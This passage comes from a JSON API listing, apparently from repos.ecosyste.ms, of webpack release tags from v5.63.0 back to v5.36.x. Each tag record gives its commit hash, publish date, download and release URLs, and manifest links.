d":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyst